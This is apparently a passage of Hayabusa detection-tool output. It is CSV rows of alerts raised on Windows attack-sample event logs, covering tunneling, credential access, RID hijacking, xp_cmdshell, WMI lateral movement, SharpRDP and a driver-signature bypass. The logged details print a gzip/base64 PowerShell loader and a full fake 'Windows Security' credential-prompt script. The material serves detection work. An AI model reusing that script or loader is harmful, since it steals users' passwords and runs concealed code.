747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:34:37.129 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 
747F3D96-3944-5D72-0000-001019773200,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = 
$cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows 
Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 
+09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | 
PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 
747F3D96-28B3-5E1E-0000-001032047C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: 
C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: 